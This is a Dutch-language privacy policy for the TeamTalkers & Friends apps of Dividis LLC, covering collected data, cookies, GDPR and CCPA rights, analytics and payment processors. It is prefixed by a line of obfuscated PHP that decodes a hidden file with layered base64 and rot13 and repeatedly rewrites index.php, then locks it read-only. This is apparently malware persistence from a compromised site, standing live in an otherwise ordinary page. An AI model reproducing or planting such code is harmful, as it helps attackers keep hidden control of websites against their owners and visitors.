$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Privacybeleid Team Talkers and Friends App - Team Talkers
T E A M T A L K E R S

 

Laatst bijgewerkt: 12/03/2020

 

Dit privacybeleid beschrijft ons beleid en onze procedures voor het verzamelen, gebruiken en vrijgeven van uw gegevens wanneer u de TeamTalkers & Friends apps gebruikt. Het privacybeleid informeert u over uw privacyrechten en hoe de wet u beschermt. We gebruiken uw persoonlijke gegevens om de service te leveren en te verbeteren. Door gebruik te maken van de dienst gaat u akkoord met het verzamelen en gebruiken van informatie in overeenstemming met dit privacybeleid.

 

Definities

 • Service
 • Een Service is het sociale platform TeamTalkers en de mobiele applicatie Friends van Dividis LLC.
 • Persoonlijke gegevens
 • Persoonsgegevens zijn alle informatie die betrekking heeft op een geïdentificeerd of identificeerbaar individu.
 • Gebruiksgegevens
 • Gebruiksgegevens zijn gegevens die automatisch worden verzameld, hetzij door het gebruik van de Service, hetzij door de Service-infrastructuur zelf (bijvoorbeeld de duur van een paginabezoek).
 • Cookies
 • Cookies zijn kleine stukjes data die op uw apparaat (computer of mobiel apparaat) zijn opgeslagen.
 • Data Controller
 • De Data Controller is de natuurlijke of rechtspersoon die (alleen of samen met andere partijen) bepaalt voor welke doeleinden en op welke wijze persoonlijke informatie wordt of moet worden verwerkt.
 • In het kader van dit Privacybeleid zijn wij een Data Controller van uw Persoonsgegevens.
 • Gegevensverwerkers (of Dienstverleners)
 • Gegevensverwerker (of Dienstverlener): elke natuurlijke of rechtspersoon die de gegevens verwerkt namens de Gegevensverwerker.
 • Wij kunnen gebruik maken van de diensten van verschillende Service Providers om uw gegevens effectiever te verwerken.
 • Gegevenssubject (of Gebruiker)
 • Een Gegevenssubject is elke levende persoon die gebruik maakt van onze Service en is het onderwerp van Persoonsgegevens.

Verzameling en gebruik van informatie

We verzamelen verschillende soorten informatie voor verschillende doeleinden om onze service aan u te leveren en te verbeteren.

Soorten verzamelde gegevens

Persoonlijke gegevens

Tijdens het gebruik van onze Service kunnen wij u vragen ons bepaalde persoonlijk identificeerbare informatie te verstrekken die kan worden gebruikt om contact met u op te nemen of u te identificeren (“Persoonsgegevens”). Persoonlijk identificeerbare informatie kan omvatten, maar is niet beperkt tot:

 • E-mailadres
 • Voor- en achternaam
 • Cookies en gebruiksgegevens
 • Telefoonnummer

Wij kunnen uw Persoonlijke Gegevens gebruiken om contact met u op te nemen met nieuwsbrieven, marketing- of promotiemateriaal en andere informatie die voor u interessant kan zijn om deze diensten voortdurend te optimaliseren en te personaliseren en u persoonlijke updates te sturen over nieuwe aanbiedingen waarvan wij denken dat deze voor u relevant zijn. U kunt zich afmelden voor het ontvangen van een of meer van deze vormen van communicatie van ons door het volgen van de afmeldingslink of instructies in een e-mail die we sturen of door contact met ons op te nemen.

 

Gebruiksgegevens

We kunnen ook informatie verzamelen die uw mobiele telefoon verstuurt wanneer u onze service bezoekt of wanneer u de service via een mobiel apparaat gebruikt (“gebruiksgegevens”).

Deze Gebruiksgegevens kunnen informatie bevatten zoals het internetprotocoladres van uw telefoon (bijv. IP-adres), het type, de versie, de pagina’s van onze Service die u bezoekt, de tijd en datum van uw bezoek, de tijd die u op die pagina’s hebt doorgebracht, unieke apparaatidentificaties en andere diagnostische gegevens.

Wanneer u de Service bezoekt via of via een mobiel apparaat, kunnen deze Gebruiksgegevens informatie bevatten zoals het type mobiel apparaat dat u gebruikt, de unieke ID van uw mobiele apparaat, het IP-adres van uw mobiele apparaat, uw mobiele besturingssysteem, het type mobiele-internetbrowser dat u gebruikt, unieke apparaatidentificaties en andere diagnostische gegevens. U kunt ook extra keuzes maken op de instellingen van uw telefoon door de gevoelige gegevensrechten van onze service te wijzigen, zoals het delen van locaties, toegang tot de lijst met contactpersonen, de camera en de microfoon.

Locatiegegevens

We kunnen informatie over uw locatie gebruiken en opslaan als u ons daarvoor toestemming geeft (“Locatiegegevens”). Wij gebruiken deze gegevens om functies van onze Service te bieden, om onze Service te verbeteren en aan te passen.

U kunt de locatieservices op elk gewenst moment in- of uitschakelen wanneer u onze Service gebruikt, via de instellingen van uw apparaat.

 

Tracking & Cookies Gegevens

We gebruiken cookies en soortgelijke traceertechnologieën om de activiteit op onze Service te volgen en houden bepaalde informatie bij om meer te weten te komen over hoe mensen onze Service gebruiken.

Cookies zijn bestanden met een kleine hoeveelheid gegevens die een anonieme unieke identificatie kunnen bevatten. Cookies worden vanaf een website naar uw browser gestuurd en worden op uw apparaat opgeslagen. Trackingtechnologieën die ook worden gebruikt zijn beacons, tags en scripts om informatie te verzamelen en te volgen en om onze Service te verbeteren en te analyseren.

Om de advertenties op onze service mogelijk te maken, kunnen we een unieke advertentie-identificatiecode delen met onze externe partners en leveranciers van reclamediensten (zoals Google). Dit omvat partners die hun advertentieplaatsingen beheren en ook adverteerders zelf en hun agentschappen of derden die hun advertentie-eisen beheren.

U kunt uw browser de opdracht geven om alle cookies te weigeren of om aan te geven wanneer er een cookie wordt verzonden. Als u echter geen cookies accepteert, is het mogelijk dat u sommige functies van onze Service niet kunt gebruiken.

Voorbeelden van cookies die we gebruiken:

 • We gebruiken Sessiecookies om onze Service te beheren.
 • We gebruiken voorkeurscookies om uw voorkeuren en verschillende instellingen te onthouden.
 • We gebruiken beveiligingscookies voor beveiligingsdoeleinden die nodig zijn om frauduleuze activiteiten te voorkomen en de veiligheid te verbeteren.

Gebruik van Gegevens

Wij verzamelen persoonlijke gegevens om de gebruikers een betere service te kunnen bieden. Wij geloven dat het belangrijk is om de juiste programma’s, diensten, reclame en andere inhoud aan te bieden aan onze gebruikers, op elk moment en elke plaats. Op deze manier leren we onze gebruikers beter kennen op basis van een aantal persoonlijke gegevens, zodat we onze diensten waar mogelijk kunnen aanpassen aan de behoeften van onze gebruikers. Ook kunnen wij op basis van uw persoonlijke gegevens contact met u opnemen om u te voorzien van advertenties en andere op uw voorkeuren afgestemde inhoud.

Dividis LLC gebruikt de verzamelde gegevens voor verschillende doeleinden:

 • Om onze Service aan te bieden en te onderhouden
 • Om u te informeren over wijzigingen in onze Service
 • Om u in staat te stellen deel te nemen aan interactieve functies van onze Service wanneer u ervoor kiest dit te doen
 • Klantenondersteuning bieden
 • Voor het verzamelen van analyses of waardevolle informatie, zodat we onze service kunnen verbeteren.
 • Om het gebruik van onze Service te monitoren
 • Om technische problemen op te sporen, te voorkomen en aan te pakken
 • Om u te voorzien van nieuws, speciale aanbiedingen en algemene informatie over andere goederen, diensten en evenementen die wij aanbieden en die vergelijkbaar zijn met die welke u al heeft gekocht of waarover u vragen heeft gesteld, tenzij u ervoor heeft gekozen om dergelijke informatie niet te ontvangen.
 • Om uw account te beheren
 • Om de identiteit van de gebruiker te verifiëren

Wij gebruiken uw Registratie- en Accountgegevens om u te registreren voor de Dienst en uw Gebruikersaccount aan te maken; uw profiel aan te maken en zichtbaar te maken; betalingen te verwerken; u informatie over uw account te geven, en te reageren op uw verzoeken; uw ervaring te personaliseren door inhoud in de Dienst aan te bieden, met inbegrip van gerichte reclame door diensten van derden waarvan wij denken dat die voor u het meest interessant is.

 

Rechtsgrondslag voor de verwerking van persoonsgegevens onder de algemene verordening inzake gegevensbescherming (AVG)

Als u afkomstig bent uit de Europese Economische Ruimte (EER), is de wettelijke basis voor het verzamelen en gebruiken van de persoonlijke informatie zoals beschreven in dit Privacybeleid afhankelijk van de Persoonlijke Gegevens die we verzamelen en de specifieke context waarin we deze verzamelen.

Dividis LLC kan uw Persoonlijke Gegevens verwerken omdat:

 • Wij een contract met u moeten uitvoeren
 • U heeft ons toestemming gegeven om dit te doen
 • De verwerking is in ons gewettigd belang en wordt niet door uw rechten overruled.
 • Voor de verwerking van betalingen
 • Om te voldoen aan de wet

Bewaring van gegevens

Dividis LLC bewaart uw persoonlijke gegevens slechts zo lang als nodig is voor de doeleinden die in dit Privacybeleid worden uiteengezet. Wij zullen uw Persoonlijke Gegevens bewaren en gebruiken voor zover dat nodig is om te voldoen aan onze wettelijke verplichtingen (bijvoorbeeld als wij uw gegevens moeten bewaren om te voldoen aan de toepasselijke wetgeving), om geschillen op te lossen en om onze wettelijke overeenkomsten en ons beleid af te dwingen.

Dividis LLC bewaart de Gebruiksgegevens ook voor interne analysedoeleinden. Gebruiksgegevens worden over het algemeen voor een kortere periode bewaard, behalve wanneer deze gegevens worden gebruikt om de veiligheid te versterken of om de functionaliteit van onze service te verbeteren, of wanneer we wettelijk verplicht zijn om deze gegevens voor een langere periode te bewaren.

Overdracht van gegevens

Uw gegevens, inclusief Persoonsgegevens, kunnen worden overgedragen naar – en onderhouden op – computers die zich buiten uw staat, provincie, land of andere overheidsrechtsgebied bevinden, waar de wetten inzake gegevensbescherming kunnen verschillen van die in uw rechtsgebied.

Als u zich buiten de Verenigde Staten of Europa bevindt en ervoor kiest om ons informatie te verstrekken, dient u er rekening mee te houden dat wij de gegevens, met inbegrip van Persoonsgegevens, overdragen aan de Verenigde Staten en Europa en daar verwerken.

Uw toestemming voor dit Privacybeleid, gevolgd door uw indiening van dergelijke informatie, betekent dat u instemt met die overdracht.

Dividis LLC zal alle stappen nemen die redelijkerwijs nodig zijn om ervoor te zorgen dat uw gegevens veilig en in overeenstemming met dit Privacybeleid worden behandeld en er zal geen overdracht van uw Persoonlijke Gegevens plaatsvinden aan een organisatie of een land, tenzij er voldoende controle is, inclusief de beveiliging van uw gegevens en andere persoonlijke informatie, en er een rechtmatige basis is voor de gegevensoverdracht.

Wettelijke grondslagen voor de overdracht en verwerking van gegevens zijn onder meer:

 • Specifieke toestemming van betrokkene om dit te doen – dit is vereist in overeenkomsten voor de verkoop van gegevens of in elke overdracht die niet gedekt wordt door de andere bases;
 • Verwerking (doorgifte) is noodzakelijk voor de uitvoering van een overeenkomst met de betrokkene – deze is geschikt voor de relatie tussen de verantwoordelijke en de verwerker en vereist geen aanvullende toestemming;
 • Legitiem belang van de onderneming – De doorgifte van gegevens onder het legitieme belang kan alleen worden geacht indien de betrokkene een dergelijke doorgifte daadwerkelijk kan verwachten;
 • Verwerking (doorgifte) is noodzakelijk voor de wettelijke verplichtingen van het bedrijf;
 • Verwerking (doorgifte) is noodzakelijk voor de bescherming van de vitale belangen van de betrokkene;
 • Openbaar belang of verzoek van de bevoegde autoriteit.

 

Openbaarmaking van gegevens

 

Uw persoonlijke gegevens worden bij ons beschermd, maar we delen deze informatie wel met beveiligde derden die we vertrouwen om u onze diensten te kunnen leveren.

 

Met Service Providers

Wij kunnen uw persoonlijke informatie delen met de Service Providers om het gebruik van onze Service te monitoren en te analyseren, om advertenties aan u te tonen om onze Service te ondersteunen en te onderhouden, om contact met u op te nemen, om te adverteren op websites van derden nadat u onze Service hebt bezocht of voor de verwerking van betalingen.

 

Met Gelieerde ondernemingen

Wij kunnen uw gegevens delen met onze gelieerde ondernemingen, in welk geval wij van deze ondernemingen eisen dat zij dit Privacybeleid respecteren. Gelieerde ondernemingen zijn onze moedermaatschappij en alle andere dochterondernemingen, joint venture partners of andere bedrijven die wij controleren of die onder gemeenschappelijke controle met ons staan.

 

Met Zakelijke partners

 We kunnen uw informatie delen met onze zakelijke partners om u bepaalde producten, diensten of promoties aan te bieden.

 

Met andere gebruikers

Wanneer U persoonlijke informatie deelt of op een andere manier in de openbare ruimtes met andere gebruikers communiceert, kan deze informatie door alle gebruikers die in onze Service zijn geregistreerd, worden bekeken. Vergeet niet dat deze informatie openbaar is op onze Services en dat deze, afhankelijk van uw privacy-instellingen, buiten het publiek kan worden verspreid. Als U met andere gebruikers binnen onze Service communiceert, kunnen anderen Uw naam, profiel, foto’s en een beschrijving van Uw activiteit zien op basis van de privacy-instellingen die U binnen de Servicegemeenschap hebt gekozen. Op dezelfde manier kunnen andere gebruikers beschrijvingen van Uw activiteit bekijken, met U communiceren, Uw profiel bekijken en verschillende inhoud met U delen.

 

Zakelijke overdracht

Als Dividis LLC betrokken is bij een fusie, overname of verkoop van activa, kunnen uw Persoonsgegevens worden overgedragen. Wij zullen u hiervan op de hoogte brengen voordat uw Persoonlijke Gegevens worden overgedragen en worden onderworpen aan een ander Privacybeleid.

 

Openbaarmaking voor wetshandhaving

Onder bepaalde omstandigheden kan Dividis LLC verplicht zijn om uw Persoonsgegevens bekend te maken indien dit wettelijk verplicht is of als reactie op geldige verzoeken van overheidsinstanties (bijv. een rechtbank of een overheidsinstantie).

 

Wettelijke verplichting

Dividis LLC kan uw Persoonlijke Gegevens bekendmaken in de overtuiging dat een dergelijke actie te goeder trouw noodzakelijk is:

 • Om te voldoen aan een wettelijke verplichting
 • Ter bescherming en verdediging van de rechten of eigendommen van Dividis LLC
 • Om mogelijke misstanden in verband met de Dienst te voorkomen of te onderzoeken
 • Ter bescherming van de persoonlijke veiligheid van de gebruikers van de Dienst of het publiek
 • Ter bescherming tegen wettelijke aansprakelijkheid

 

Beveiliging van gegevens

De veiligheid van uw gegevens is belangrijk voor ons, maar vergeet niet dat geen enkele methode van overdracht via het internet, of methode van elektronische opslag 100% veilig is. Hoewel we ernaar streven om commercieel aanvaardbare middelen te gebruiken om uw Persoonlijke Gegevens te beschermen, kunnen we de absolute veiligheid ervan niet garanderen.

 

Fraude- en Spampreventie

Voorkom Fraude & Spam; Wij willen dat onze Service vrij is van spam en frauduleuze inhoud, zodat u zich veilig en vrij voelt. We kunnen uw informatie gebruiken om fraude, veiligheidsinbreuken, potentieel verboden of illegale activiteiten te voorkomen, op te sporen en te onderzoeken, onze handelsmerken te beschermen en onze Algemene Voorwaarden af te dwingen.

 

“Do Not Track” (niet volgen) onder de California Online Privacy Protection Act (CalOPPA)

Wij ondersteunen geen Do Not Track (“DNT”). Do Not Track is een voorkeur die u kunt instellen in uw webbrowser om websites te informeren dat u niet gevolgd wilt worden. Inwoners van de staat Californië kunnen een lijst opvragen van alle derde partijen waaraan onze App bepaalde persoonlijke informatie (zoals gedefinieerd door de wet van Californië) in het voorafgaande jaar heeft bekendgemaakt voor de direct marketingdoeleinden van die derde partijen. Als u een inwoner van Californië bent en een dergelijke lijst wilt, neem dan contact met ons op via privacy@teamtalkers.com. U dient te bevestigen dat u een inwoner van Californië bent en een actueel adres in Californië op te geven voor onze reactie. Houd er rekening mee dat verzoeken via de telefoon of per post niet acceptabel zijn en wij dragen geen verantwoordelijkheid voor berichten die niet gelabeld zijn of niet correct zijn verzonden, of die geen volledige informatie bevatten.

U kunt ¨Do Not Track¨ in- of uitschakelen door de Voorkeuren of Instellingen pagina van uw webbrowser te bezoeken.

 

De California Consumer Privacy Act (CCPA) vereist de openbaarmaking van de verzameling van persoonlijke informatie door middel van verwijzing naar specifieke categorieën die in de wet worden genoemd. De categorieën informatie die wij rechtstreeks van u kunnen verzamelen zijn onder andere “identifiers” en “beschermde kenmerken”. De categorieën informatie die wij automatisch van u kunnen verzamelen door het gebruik van cookies en soortgelijke technologieën omvatten “identificatoren”, “geolocatiegegevens”, “commerciële informatie”, “audio-, elektronische, visuele of soortgelijke informatie” en “informatie over activiteiten op het internet of andere elektronische netwerken”.

 

Uw rechten op het gebied van gegevensbescherming op grond van de Algemene Verordening inzake Gegevensbescherming (AVG)

Als u ingezetene bent van de Europese Economische Ruimte (EER), heeft u bepaalde rechten op het gebied van gegevensbescherming. Dividis LLC zal alle redelijke stappen ondernemen om u in staat te stellen uw persoonlijke gegevens te corrigeren, te wijzigen, te verwijderen of het gebruik ervan te beperken.

Als u wilt weten welke persoonlijke gegevens wij over u bewaren en als u wilt dat deze uit onze systemen worden verwijderd, neem dan contact met ons op.

 

In bepaalde omstandigheden heeft u de volgende rechten op het gebied van gegevensbescherming:

 • Het recht om de informatie die wij over u hebben in te zien, bij te werken of te verwijderen. Wanneer dit mogelijk is, kunt u toegang krijgen tot uw persoonlijke gegevens, deze bijwerken of verzoeken om deze te verwijderen binnen uw accountinstellingen. Als u niet in staat bent om deze handelingen zelf uit te voeren, neem dan contact met ons op om u te helpen.
 • Het recht op correctie. U heeft het recht om uw gegevens te laten corrigeren als deze onjuist of onvolledig zijn.
 • Het recht om bezwaar te maken. U heeft het recht om bezwaar te maken tegen de verwerking van uw Persoonsgegevens door ons.
 • Het recht van beperking. U heeft het recht om te verzoeken dat wij de verwerking van uw persoonsgegevens beperken.
 • Het recht op overdraagbaarheid van gegevens. U heeft het recht om een kopie te ontvangen van de informatie die wij over u hebben in een gestructureerd, machinaal leesbaar en algemeen gebruikt formaat.
 • Het recht om toestemming in te trekken. U hebt ook het recht om uw toestemming in te trekken op elk moment dat Dividis LLC vertrouwt op uw toestemming om uw persoonlijke gegevens te verwerken.

 

Houd er rekening mee dat we u kunnen vragen om uw identiteit te verifiëren voordat we op dergelijke verzoeken reageren.

U hebt het recht om een klacht in te dienen bij een gegevensbeschermingsautoriteit over het verzamelen en gebruiken van uw persoonlijke gegevens. Voor meer informatie kunt u contact opnemen met uw lokale gegevensbeschermingsautoriteit in de Europese Economische Ruimte (EER).

 

We kunnen uw toestemming krijgen om bepaalde soorten persoonlijke informatie te verzamelen en te gebruiken wanneer we daartoe wettelijk verplicht zijn (bijvoorbeeld met betrekking tot cookies en traceertechnologieën of wanneer we nauwkeurige locatiegegevens verwerken voor andere doeleinden dan het uitvoeren van de dienst). Als we uw toestemming vragen om uw persoonlijke gegevens te verwerken, kunt u uw toestemming te allen tijde intrekken door contact met ons op te nemen met behulp van de gegevens aan het einde van dit Privacybeleid of door uw instelling binnen de Service te wijzigen of door de instelling binnen de Service te wijzigen. We raden u aan contact met ons op te nemen om uw gegevens bij te werken of te corrigeren als deze veranderen of als de persoonlijke gegevens die we over u hebben, onjuist zijn.

Service Providers

Wij kunnen externe bedrijven en personen in dienst nemen om onze Service te faciliteren (“Service Providers”), om de Service namens ons te leveren, om Servicegerelateerde diensten uit te voeren of om ons te helpen bij het analyseren van de manier waarop onze Service wordt gebruikt.

Deze derden hebben alleen toegang tot uw Persoonsgegevens om deze taken namens ons uit te voeren en zijn verplicht om deze niet openbaar te maken of te gebruiken voor andere doeleinden. Wij hebben passende waarborgen (zoals contractuele overeenkomsten) ingesteld in overeenstemming met de toepasselijke wettelijke vereisten om ervoor te zorgen dat uw gegevens adequaat worden beschermd.

Voor het leveren van onze diensten vertrouwen wij op een aantal onafhankelijke bedrijven of dienstverleners, zoals het leveren van een aantal infrastructuur- of IT-diensten, het uitvoeren van betalingstransacties via onze diensten, het uitvoeren van enquêtes, enzovoorts. Het is mogelijk dat dergelijke bedrijven in het kader van hun opdracht toegang hebben tot bepaalde gegevens en informatie. Wij staan dit toe voor zover dit noodzakelijk is voor de uitvoering van de opdracht en deze bedrijven bieden de nodige garanties met betrekking tot de toegang en het eventuele gebruik van deze gegevens en informatie.

Analytics

Onze dienst maakt gebruik van Google Analytics en Firebase Analytics diensten. Google Analytics maakt gebruik van “cookies”, tekstbestanden die op uw computer worden geplaatst, om de dienst te helpen analyseren hoe gebruikers deze gebruiken en Firebase biedt tal van opties om gebeurtenissen binnen onze dienst te meten en parameters in te stellen op basis van de activiteit van de gebruikers.  Voor meer informatie over het gebruik en de soorten cookies verwijzen wij u naar de sectie “Tracking en Cookies Data”.

De door de cookie gegenereerde informatie over uw gebruik van de Service (inclusief uw IP-adres) wordt doorgestuurd naar en door Google opgeslagen op servers in de Verenigde Staten.

Google gebruikt deze informatie om uw gebruik van de Service te evalueren, om rapporten over de gebruikersactiviteit op te stellen voor de exploitanten en om andere diensten met betrekking tot de verkeersactiviteit en het internetgebruik te leveren.

Google mag deze informatie aan derden verschaffen indien Google hiertoe wettelijk wordt verplicht, of voor zover deze derden de informatie namens Google verwerken. Google zal uw IP-adres niet combineren met andere gegevens waarover Google beschikt.

Bovendien kunnen sommige Firebase-diensten worden gebruikt om meldingen aan gebruikers te sturen. Voor deze vorm van communicatie is de toestemming van de gebruiker nodig voordat hij/zij op een dergelijke manier contact met hen opneemt. Als u toestemming heeft gegeven om gecontacteerd te worden, maar u wilt zich afmelden nadat de toestemming is gegeven, heeft u het recht om “Vergeten” te zijn door te klikken op de afmeldingslink in de communicatiemail die u door ons is toegestuurd.

Voor meer informatie kunt u het officiële privacybeleid en de voorwaarden van Google raadplegen via de onderstaande links:

https://policies.google.com/privacy?hl=en-US

 

https://firebase.google.com/support/privacy

Door gebruik te maken van onze Service geeft u toestemming om gegevens over u te verwerken op de wijze en voor de doeleinden zoals hierboven beschreven.

U kunt voorkomen dat uw gegevens worden verzameld door Google en Firebase Analytics door contact met ons op te nemen via privacy@teamtalkers.com. Er wordt een opt-out-cookie ingesteld om te voorkomen dat uw gegevens worden verzameld. Houd er echter rekening mee dat u mogelijk geen gebruik kunt maken van sommige functies van onze Service.

Betalingen

Wij kunnen betaalde producten en/of diensten leveren binnen de Service. In dat geval maken we gebruik van beveiligde diensten van derden voor de verwerking van betalingen (bijv. betalingsverwerkers).

We zullen uw betaalkaartgegevens niet opslaan of verzamelen. Deze informatie wordt rechtstreeks verstrekt aan onze externe betalingsverwerkers, wier gebruik van uw persoonlijke gegevens wordt geregeld door hun Privacybeleid. Deze betalingsverwerkers houden zich aan de standaarden die zijn vastgesteld door PCI-DSS, zoals beheerd door de PCI Security Standards Council, een gezamenlijke inspanning van merken als Visa, Mastercard, American Express en Discover. De PCI-DSS-vereisten helpen de veilige verwerking van betalingsinformatie te garanderen.

 

De betalingsverwerkers waar we mee werken zijn:

Hun privacybeleid kan worden geraadpleegd op https://www.paypal.com/webapps/mpp/ua/privacy-full

 

Links naar andere sites

Onze Service kan links bevatten naar andere sites die niet door ons worden beheerd. Als u op een link van een derde partij klikt, wordt u doorgestuurd naar de site van die derde partij. Wij raden u sterk aan om het Privacybeleid van elke site die u bezoekt door te nemen.

Wij hebben geen controle over en nemen geen verantwoordelijkheid voor de inhoud, het privacybeleid of de praktijken van sites of diensten van derden.

Privacy van kinderen

Onze Service richt zich niet tot personen onder de 18 jaar (“Kinderen”).

We verzamelen niet bewust persoonlijk identificeerbare informatie van iemand onder de leeftijd van 18 jaar. Als u een ouder of voogd bent en u weet dat uw kind ons persoonlijke gegevens heeft verstrekt, neem dan contact met ons op. Als we erachter komen dat we persoonsgegevens van kinderen hebben verzameld zonder verificatie van de toestemming van de ouders, nemen we maatregelen om die informatie van onze servers te verwijderen.

We kunnen ook beperken hoe we sommige gegevens van gebruikers tussen 13 en 18 jaar oud verzamelen, gebruiken en opslaan. In sommige gevallen betekent dit dat wij niet in staat zijn om bepaalde functies van de Service aan deze gebruikers te leveren.

Indien we moeten vertrouwen op toestemming als wettelijke basis voor de verwerking van Uw gegevens en Uw land toestemming van een ouder nodig heeft, kunnen we de toestemming van Uw ouders nodig hebben voordat we die informatie verzamelen en gebruiken.

Wijzigingen in dit Privacybeleid

We kunnen ons Privacybeleid van tijd tot tijd aanpassen. Wij zullen u op de hoogte brengen van eventuele wijzigingen door het nieuwe Privacybeleid op deze pagina te plaatsen.

Wij zullen u via e-mail en/of een opvallende mededeling op onze Service op de hoogte stellen, voordat de wijziging van kracht wordt en de “ingangsdatum” bovenaan dit Privacybeleid updaten.

U wordt geadviseerd om dit Privacybeleid regelmatig te raadplegen voor eventuele wijzigingen. Wijzigingen in dit Privacybeleid zijn van kracht wanneer ze op deze pagina worden geplaatst.

 

Contact opnemen

Als u vragen of opmerkingen heeft of als u geen gebruik meer wilt maken van onze diensten en/of producten, neem dan contact met ons op via privacy@teamtalkers.com

 

Per e-mail: office@teamtalkers.com 

Door deze pagina op onze website te bezoeken: https://www.teamtalkers.com/contact/

Per telefoon: 00359 87 77 87 819